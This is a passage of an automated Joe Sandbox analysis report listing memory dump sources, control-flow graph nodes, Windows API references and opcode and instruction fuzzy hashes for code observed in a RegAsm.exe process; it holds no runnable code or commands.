                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e87283cbe90e1d5b209ed4b93acd611d9f751cbfc1575bffc4a8baf733913da
                                                                    • Instruction ID: ad4b9b29266e0760aac0526dd1f98686cbfef92edd6674e89d6dbce7e226850c
                                                                    • Opcode Fuzzy Hash: 9e87283cbe90e1d5b209ed4b93acd611d9f751cbfc1575bffc4a8baf733913da
                                                                    • Instruction Fuzzy Hash: 6D32A134B0420A9FDF14DF69D990BAEBBB6FB88310F10852AE406DB355DB35EC418B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a8e016e1060ba333bf6dd67e15c402e1657581e74d9438e885477ee3a7adcd0
                                                                    • Instruction ID: 657c21ebefb3c618c95a822e073ae62e6f0a2803b30664b9a580a1e59e8da32f
                                                                    • Opcode Fuzzy Hash: 6a8e016e1060ba333bf6dd67e15c402e1657581e74d9438e885477ee3a7adcd0
                                                                    • Instruction Fuzzy Hash: D4B17B70E0020D8FEB54CFA9D8827AEBBF2AF88314F14852DD955E7694EB749845CB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2062 67fd490-67fd494 2063 67fd496-67fd49c 2062->2063 2063->2063 2064 67fd49e-67fd4a4 2063->2064 2065 67fd4de-67fd556 2064->2065 2066 67fd4a6-67fd4d0 call 67fa464 2064->2066 2068 67fd558-67fd55e 2065->2068 2069 67fd561-67fd568 2065->2069 2070 67fd4d5-67fd4d6 2066->2070 2068->2069 2071 67fd56a-67fd570 2069->2071 2072 67fd573-67fd612 CreateWindowExW 2069->2072 2071->2072 2074 67fd61b-67fd653 2072->2074 2075 67fd614-67fd61a 2072->2075 2079 67fd655-67fd658 2074->2079 2080 67fd660 2074->2080 2075->2074 2079->2080 2081 67fd661 2080->2081 2081->2081
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51e99039fc9735672021e51542bb8f5f34d83a1073a5a52bdfff85800193c016
                                                                    • Instruction ID: b30016225fc224a2aa6ced535f21ffacafdd07d9d7f649f1773c7592422e7056
                                                                    • Opcode Fuzzy Hash: 51e99039fc9735672021e51542bb8f5f34d83a1073a5a52bdfff85800193c016
                                                                    • Instruction Fuzzy Hash: CE511EB1C10249EFDF11CF99C984ADEBFB6BF48314F24816AE918AB220D3719945CF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2082 597e580-597e58b 2083 597e5b5-597e5d4 call 597d1d4 2082->2083 2084 597e58d-597e5b4 call 597d1c8 2082->2084 2090 597e5d6-597e5d9 2083->2090 2091 597e5da-597e639 2083->2091 2098 597e63f-597e6cc GlobalMemoryStatusEx 2091->2098 2099 597e63b-597e63e 2091->2099 2102 597e6d5-597e6fd 2098->2102 2103 597e6ce-597e6d4 2098->2103 2103->2102
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d48038faf72bd1a615df370addbcabab54a835dd9f65c8cb5c9f25c0fb345e6
                                                                    • Instruction ID: 77256de9afae28f361ac96676903be804c056801f3afaccc7b2fa8d95dd93940
                                                                    • Opcode Fuzzy Hash: 5d48038faf72bd1a615df370addbcabab54a835dd9f65c8cb5c9f25c0fb345e6
                                                                    • Instruction Fuzzy Hash: 3D411472E143598FCB04DFB9D8446EEBBF5BF88220F14856BD809A7341EB749845CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2106 67fd4f0-67fd556 2107 67fd558-67fd55e 2106->2107 2108 67fd561-67fd568 2106->2108 2107->2108 2109 67fd56a-67fd570 2108->2109 2110 67fd573-67fd5ab 2108->2110 2109->2110 2111 67fd5b3-67fd612 CreateWindowExW 2110->2111 2112 67fd61b-67fd653 2111->2112 2113 67fd614-67fd61a 2111->2113 2117 67fd655-67fd658 2112->2117 2118 67fd660 2112->2118 2113->2112 2117->2118 2119 67fd661 2118->2119 2119->2119
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067FD602
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 118f6ebd43bd8056ebbf8b79586506c98e6a85fc8d72092360bb23b1ce59dbdd
                                                                    • Instruction ID: c4bb2e31efff822e6eb59a1434010a4fdc6c2a294ae1997345193caf5f5ec35f
                                                                    • Opcode Fuzzy Hash: 118f6ebd43bd8056ebbf8b79586506c98e6a85fc8d72092360bb23b1ce59dbdd
                                                                    • Instruction Fuzzy Hash: 9941CFB1D10349DFDB24CF99C984ADEBBB5FF48314F24812AE918AB210D7709985CF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2120 67fe46c-67ffc6c 2123 67ffd1c-67ffd3c call 67fa48c 2120->2123 2124 67ffc72-67ffc77 2120->2124 2131 67ffd3f-67ffd4c 2123->2131 2126 67ffcca-67ffd02 CallWindowProcW 2124->2126 2127 67ffc79-67ffcb0 2124->2127 2129 67ffd0b-67ffd1a 2126->2129 2130 67ffd04-67ffd0a 2126->2130 2134 67ffcb9-67ffcc8 2127->2134 2135 67ffcb2-67ffcb8 2127->2135 2129->2131 2130->2129 2134->2131 2135->2134
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 067FFCF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 43e4849d4e62b5ea0e9f1abc5414a01201f552074056aa0f4ac026776dbe6abb
                                                                    • Instruction ID: db2e3e350a0a2baed6ab74f785dd75eedeace7b8d6d9c0361b32509f3d053984
                                                                    • Opcode Fuzzy Hash: 43e4849d4e62b5ea0e9f1abc5414a01201f552074056aa0f4ac026776dbe6abb
                                                                    • Instruction Fuzzy Hash: 21415CB4910355CFDB54CF99C848EAABBF5FF88314F25C859E619AB320D774A841CBA0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2137 597d1d4-597e6cc GlobalMemoryStatusEx 2140 597e6d5-597e6fd 2137->2140 2141 597e6ce-597e6d4 2137->2141 2141->2140
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0597E5D2), ref: 0597E6BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: 9bc213d780887b40bfc7c46a92b6c98a0f54183541e031bedd3762872f40d5fa
                                                                    • Instruction ID: 3eb6ffc4d159bdc69002f1b9b14946981454c16c3104be5d5e518aabfc374310
                                                                    • Opcode Fuzzy Hash: 9bc213d780887b40bfc7c46a92b6c98a0f54183541e031bedd3762872f40d5fa
                                                                    • Instruction Fuzzy Hash: 6A1153B1C006599BCB10CFAAC444B9EFBF8FB08324F14816AD818A7200D378A904CFA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \V]m
                                                                    • API String ID: 0-4105700344
                                                                    • Opcode ID: edac4fb22bccc30d93ca95b40728e2f0c9e15e1de7042a4b51f1df84a926c0d8
                                                                    • Instruction ID: 135ecce23541db921080293f15d9e2613047bc697ea038358aa19209307e3eab
                                                                    • Opcode Fuzzy Hash: edac4fb22bccc30d93ca95b40728e2f0c9e15e1de7042a4b51f1df84a926c0d8
                                                                    • Instruction Fuzzy Hash: 0E914AB0E002099FDB54CFA8C9867DEBBF1BF58314F148129E954EB694EB749849CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRtq
                                                                    • API String ID: 0-4092542751
                                                                    • Opcode ID: e4f5f4bbb121ce75280aa1765b38b9b62c8321ec656741f7de912cab9e1c0b10
                                                                    • Instruction ID: a3615e642ed07abbb87c354dfcaa4db745b77673d8f353ca79e0c9c822f847dc
                                                                    • Opcode Fuzzy Hash: e4f5f4bbb121ce75280aa1765b38b9b62c8321ec656741f7de912cab9e1c0b10
                                                                    • Instruction Fuzzy Hash: 04518C34700215CFDB05EB68C459AAD7BF2BF88700F2040ADE646EB7A5DB769C41CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRtq
                                                                    • API String ID: 0-4092542751
                                                                    • Opcode ID: a5f498f6e2a4cf2d9c529a4ab4c7acd335877389c0204e3264e694600365ee7b
                                                                    • Instruction ID: 5fadfc240162e04ff809d22def27609f3236a105970852beb98cb3d9bde42660
                                                                    • Opcode Fuzzy Hash: a5f498f6e2a4cf2d9c529a4ab4c7acd335877389c0204e3264e694600365ee7b
                                                                    • Instruction Fuzzy Hash: A7319430E10219CBDB55CF69C44679EB7F1EF89300F60845AEA41EB351DB719C41CB52
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRtq
                                                                    • API String ID: 0-4092542751
                                                                    • Opcode ID: 1c8ba58e71062a6629f4bfa8707503c810491bdf5e3b75c7f2e45ac4a6effcc7
                                                                    • Instruction ID: d2554abb8f7b68d7b3920898467a3e32f2bd23408e732bf0cc6e8775475b85c4
                                                                    • Opcode Fuzzy Hash: 1c8ba58e71062a6629f4bfa8707503c810491bdf5e3b75c7f2e45ac4a6effcc7
                                                                    • Instruction Fuzzy Hash: 4E317031E10209CBDB55CFA9C4457EEB7F2EF89310F50856AEA46EB640EB70AD41CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRtq
                                                                    • API String ID: 0-4092542751
                                                                    • Opcode ID: 65d2e610b51e9fc31f757e72b348d4d52ca28ce1b8772fd8b27af230b6be102d
                                                                    • Instruction ID: fc007c64246d64dae28014868b31d8f13002fa94581ec5ae5f14593da22054b9
                                                                    • Opcode Fuzzy Hash: 65d2e610b51e9fc31f757e72b348d4d52ca28ce1b8772fd8b27af230b6be102d
                                                                    • Instruction Fuzzy Hash: 4801F5717186518FC704E778D4627AD7BA2EFCA310F50C46AD049CB780DE768842CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc48e54b42daa875223513b5bd7680f736c0b10ffc09d15265ef4671d2b87f5b
                                                                    • Instruction ID: 60c97d5504aa7b0e4e0791e90c845e552e9a91b3f082a802492e641396a5fdf5
                                                                    • Opcode Fuzzy Hash: cc48e54b42daa875223513b5bd7680f736c0b10ffc09d15265ef4671d2b87f5b
                                                                    • Instruction Fuzzy Hash: 7C1280707002068BDB15AB39E4A925C77E2FBC9314F108A2AE586CF345DF35EC979B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c69d0ca9953611768692902f796b487c26df5f9624972f7572fed552abb0e95
                                                                    • Instruction ID: 5f3462d9b20df92e18b5cec3eb4e986590c0263aed40be072b194478ac8d1b98
                                                                    • Opcode Fuzzy Hash: 8c69d0ca9953611768692902f796b487c26df5f9624972f7572fed552abb0e95
                                                                    • Instruction Fuzzy Hash: 91128F707002068BDB15AB39E4A925C77E2FBC9314F508A2AE582CF345DF35EC979B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59ef824e3844de472de5e0e66e4c41422322f5bc07b11a2adc5d9c26d9544e4d
                                                                    • Instruction ID: 0b0b1fbfefd732a61af5d792124608907ae99845035487383ef041c08072689f
                                                                    • Opcode Fuzzy Hash: 59ef824e3844de472de5e0e66e4c41422322f5bc07b11a2adc5d9c26d9544e4d
                                                                    • Instruction Fuzzy Hash: 72A16A70E0020E8FDB54CFA8D8827DEBBF1AF88314F14856DD994E7694EB749885CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a65c8b0c2188cc58103d4e886609a9197023378f9b8c37cfa01c505655d9408a
                                                                    • Instruction ID: 23aa849755f3eb0fefe7f89ca1edc277337c679b94824b1fdda8ec896f0a8fd0
                                                                    • Opcode Fuzzy Hash: a65c8b0c2188cc58103d4e886609a9197023378f9b8c37cfa01c505655d9408a
                                                                    • Instruction Fuzzy Hash: D6A16D34B00215CFDB55DFA8D885AADBBF2EF88350F148568E94AAB751DE30EC42CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d3cab53af879c2e724ba35df2ddf223bda39d8d9fa87b18cb9f6b36a9f32876
                                                                    • Instruction ID: 055524a6d87797a1f6392170237bee6e8b9c4b28b940c77cf97e2ffbcc04b206
                                                                    • Opcode Fuzzy Hash: 8d3cab53af879c2e724ba35df2ddf223bda39d8d9fa87b18cb9f6b36a9f32876
                                                                    • Instruction Fuzzy Hash: C7717B71A00205DFDB44DF69D885B9DBBF5FF88310F14C1A9EA09AB395EB719841CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7967e85df9376ffbcc6f308cdf4783df3e509f5cb47a1e9290fd9149426b337
                                                                    • Instruction ID: 56fd9b14b2eb61f4774ed9b6821b32a147a93d11947846395d22ef5d928b8a18
                                                                    • Opcode Fuzzy Hash: d7967e85df9376ffbcc6f308cdf4783df3e509f5cb47a1e9290fd9149426b337
                                                                    • Instruction Fuzzy Hash: F841D170B00206CFDF65DA6CC98176E77B5EB89310F20496AEA4ADB742D735DC818B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59b3be48357d91faf9824ee2a2944b82d4499f1b64e59330e92e4bfaaad460cf
                                                                    • Instruction ID: c14204bdccb7862604cede398b43919083dd17b767c25c7484d4840516ede3d6
                                                                    • Opcode Fuzzy Hash: 59b3be48357d91faf9824ee2a2944b82d4499f1b64e59330e92e4bfaaad460cf
                                                                    • Instruction Fuzzy Hash: 615113B1D102188FDB18CFA9C886B9DBBF1BF48310F14856DE959BB791CB75A844CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea6986e87c4fe59e8d5b8a33d7ab3b085860297d828e1f8b8c8984f790d5678f
                                                                    • Instruction ID: 2131bd108a07df352e7cea8af26584e4e951ae71ebd38d503ac3b0bbb81c3c11
                                                                    • Opcode Fuzzy Hash: ea6986e87c4fe59e8d5b8a33d7ab3b085860297d828e1f8b8c8984f790d5678f
                                                                    • Instruction Fuzzy Hash: B1514E701112638FCB16EF7BF994A543FA1FB563087048B55E1458B27EE63A78C6CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fe392da66b8a1fe606435edc72f62bf1b918267992d3ce0225109b6c52f155b
                                                                    • Instruction ID: 58b6fb9f3455a5a70e2648836c1d469bc2b711490b14ea3317404574f60bf87d
                                                                    • Opcode Fuzzy Hash: 2fe392da66b8a1fe606435edc72f62bf1b918267992d3ce0225109b6c52f155b
                                                                    • Instruction Fuzzy Hash: 7B5121B1D102188FDB18CFA9C885B9EBBF1BF48310F14852DE959BB791CB75A844CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ae3d601525c56dbe6ca584e1e929c4dacbfa3334b7fbd7ecaaf2bd704d61203
                                                                    • Instruction ID: d47ad9acbeac160c1eed06f818c21a6889c1e4d7dce442a93eaaf693de9b2a6c
                                                                    • Opcode Fuzzy Hash: 2ae3d601525c56dbe6ca584e1e929c4dacbfa3334b7fbd7ecaaf2bd704d61203
                                                                    • Instruction Fuzzy Hash: 4D41F070B00106CBDF61DA6CC58176E77B5EB8D310F20496AEA4ADB741D735DC818B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b7cc97a582f8d56054a5a5cc4882fe8d10ed6e07ad8f64fc1c65446fca63625
                                                                    • Instruction ID: e2e60571fbb5afbbc3a97f0785a5072c1f08c88c84a8fb3502a7d9f3e1d5e68c
                                                                    • Opcode Fuzzy Hash: 9b7cc97a582f8d56054a5a5cc4882fe8d10ed6e07ad8f64fc1c65446fca63625
                                                                    • Instruction Fuzzy Hash: C351E9702112638FCB1AFF7BF9949543BA1F7553083048B15E2458B27EEA7A79C6CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5c86c474721210d9817e402cc5d8dcf4ac18b69a946b0f486d7374fe4e6e7e7
                                                                    • Instruction ID: b73f323221703cd8a47b1b778d2df6bcd3d6067253e4ef936c972b28af1cbcd7
                                                                    • Opcode Fuzzy Hash: f5c86c474721210d9817e402cc5d8dcf4ac18b69a946b0f486d7374fe4e6e7e7
                                                                    • Instruction Fuzzy Hash: 8B41EDB0D002499FDB14CFA9C985A9EBFF5BF48314F148429E909AB250DB75A946CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f332a7f1d2807fb77d5c3eb01c095f3e8f5ba83189bbbad24fbd3e56c55e6305
                                                                    • Instruction ID: 464909d925f4b411a359e7fb4931742fa71e5e334410acf16aad5282a7ba511e
                                                                    • Opcode Fuzzy Hash: f332a7f1d2807fb77d5c3eb01c095f3e8f5ba83189bbbad24fbd3e56c55e6305
                                                                    • Instruction Fuzzy Hash: FA41EDB0D00349DFDB10CFA9C985A9EBFF5FF48314F148429E909AB250DB75A946CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ad9cde6d75156ab89693aec2e833c1e76769d8b0513dd33c7d186371fb6741c
                                                                    • Instruction ID: 7cd7592e830d707246480e96a7e6b1e7f3f4eb60f91c4747709fb6d2c6804bc8
                                                                    • Opcode Fuzzy Hash: 3ad9cde6d75156ab89693aec2e833c1e76769d8b0513dd33c7d186371fb6741c
                                                                    • Instruction Fuzzy Hash: B1319F30A0020ADBCB09CF65D89169EFBB2BF89340F10C619E905AB741EB709842CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30eb9745a9424f921912c48978e5665135355abe2903b15e613c9c87747508c1
                                                                    • Instruction ID: 394e7554a96cdfbd76dc820f951a53575c5666a41a1b85190e0add5c1325c8c0
                                                                    • Opcode Fuzzy Hash: 30eb9745a9424f921912c48978e5665135355abe2903b15e613c9c87747508c1
                                                                    • Instruction Fuzzy Hash: 8B218070E0020ADBDB09DF69D89169EF7B2FF89340F10C619E909EB741DB719882CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f773710d1129d3e03d792ad02881f118d85ee6e8e920c18b9a0f36d53f75de1
                                                                    • Instruction ID: 3c5bd61826f1ce0caa29549636fc4c233fb514972e25dfaff15ee6d8fedeb435
                                                                    • Opcode Fuzzy Hash: 2f773710d1129d3e03d792ad02881f118d85ee6e8e920c18b9a0f36d53f75de1
                                                                    • Instruction Fuzzy Hash: 33214834600609CFDB54EB38D959A9E7BF1EF89304F1004A8F646EB365EB36AC41CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36d4516656648e2d92b1765b643a6e20e4a7eb3b405b3f669b737ef7d4788f56
                                                                    • Instruction ID: ed95b3e9617074b1c89cf14c332518ef4cec6eb91757e2718c9e9897b66b8615
                                                                    • Opcode Fuzzy Hash: 36d4516656648e2d92b1765b643a6e20e4a7eb3b405b3f669b737ef7d4788f56
                                                                    • Instruction Fuzzy Hash: 91210A746101118BDF66FB7EF88575937A2FB48308F104E69E10ACB6A5EA35D8C4CB41
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e91bd75c0b57f27b115fa0eba32178804e0916e0c5598d47b9f0a820375cb96
                                                                    • Instruction ID: 8bb8e902b6c08515b67dced3f47e217645012515d09777d83e7116bedc5d63ca
                                                                    • Opcode Fuzzy Hash: 6e91bd75c0b57f27b115fa0eba32178804e0916e0c5598d47b9f0a820375cb96
                                                                    • Instruction Fuzzy Hash: 2421A930B04216CFDB64EB78C6567AE77F2AF49200F1004ADD246EB790DB769C41CBA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 29d20cae1fcaa0d339b6e73ee4ae23661595f2a89b91bfdc00208d0cf54e34ff
                                                                    • Instruction ID: 9a9b75d59705c190b9fcc7ee109f5804c3675f3b7a882b4728d2e5b435f1a9c1
